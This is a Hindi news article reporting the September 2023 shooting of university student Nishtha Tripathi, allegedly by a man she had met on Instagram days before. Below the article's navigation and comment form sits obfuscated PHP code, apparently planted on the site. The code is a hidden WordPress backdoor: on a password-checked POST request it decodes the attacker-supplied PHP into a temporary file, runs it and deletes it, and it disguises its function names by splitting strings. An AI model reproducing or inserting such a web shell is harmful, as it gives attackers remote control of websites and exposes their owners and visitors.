निष्ठा त्रिपाठी हत्याकांड मे चैट ने खोले कई राज, पांच दिन पहले ही हुई थी इंस्टाग्राम पर दोस्ती, दो बार मुलाकात

Uttarakhand Press 22 September 2023: बीबीडी यूनिर्वसिटी में बीकॉम थर्ड ईयर की छात्रा निष्ठा त्रिपाठी की पांच दिन पहले ही आदित्य पाठक से इंस्टाग्राम पर बातचीत हुई थी। दोस्ती हुई और फिर वह दो बार उसके घर गई। तीसरी बार बुधवार रात वह उसके घर गई तो कुछ ही घंटे में उसकी पिस्टल से गोली मारकर हत्या कर दी गई। ये तथ्य पुलिस की जांच में सामने आए हैं। साजिश के तहत वारदात की गई, इस पहलू पर पुलिस तफ्तीश कर रही है। शुरुआती जांच में आपसी विवाद की बात सामने आई है। मोबाइल नंबरों की कॉल डिटेल, सोशल मीडिया की चैट आदि से तहकीकात चल रही है।

पुलिस के मुताबिक आदित्य कुछ दोस्तों के जरिये पहले एक-दो बार निष्ठा से मिला था, पर दोनों में कोई बात नहीं हुई थी। सिर्फ बीते पांच दिनों से ही इंस्टाग्राम पर दोनों में बातचीत हो रही थी। आशंका है कि शायद आदित्य ने उसे पहले से टारगेट कर रखा था, इसीलिए सोशल मीडिया के जरिये संपर्क किया। इसके बाद दोस्ती की और फिर कत्ल कर दिया। हालांकि, ये तथ्य जांच पूरी होने के बाद स्पष्ट हो सकेंगे।

रात 9:52 बजे मां से हुई थी आखिरी बार बात:
परिजन ने बताया कि बुधवार रात 9:52 बजे निष्ठा की मां से आखिरी बार बात हुई थी। तब उसने बताया था कि वह कॉलेज में गणेशा पूजा पंडाल में आई है। उसने एक फोटो भी व्हॉट्सएप स्टेटस पर लगाई थी। इसके बाद सुबह करीब साढ़े पांच बजे पुलिस ने संतोष को फोन कर निष्ठा की हत्या की जानकारी दी। परिजन ने बताया कि जब रात में बात हुई थी तो सबकुछ सामान्य था। निष्ठा भी खुश थी। चंद घंटे बाद ही आदित्य ने उसे मार दिया।

दो महीने पहले छोड़ा था हॉस्टल:
पुलिस के मुताबिक निष्ठा पहले कॉलेज के हॉस्टल में रहती थी। बीते दो महीने से वह पार्श्वनाथ सिटी अपार्टमेंट के फ्लैट में किराये पर रह रही थी। साथ में उसके गांव की कीर्ति व अमीशा रहती थी। अमीशा पासआउट है, वहीं कीर्ति डेंगू होने से गांव में है। अभी निष्ठा अकेले फ्लैट में रह रही थी।

Read Previous

Uttarakhand: पहाड़ के 40 फीसदी मार्गों पर रोडवेज बस सेवा बंद, लाइफलाइन मानी जाती थी रोडवेज, आज चरम पर डग्गामारी

Read Next

दर्दनाक घटना: कोचिंग जा रही छात्रा पैर फिसलने से नाले में गिरी, पानी में डूबकर मौत

Leave a Reply

Your email address will not be published. Required fields are marked *

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}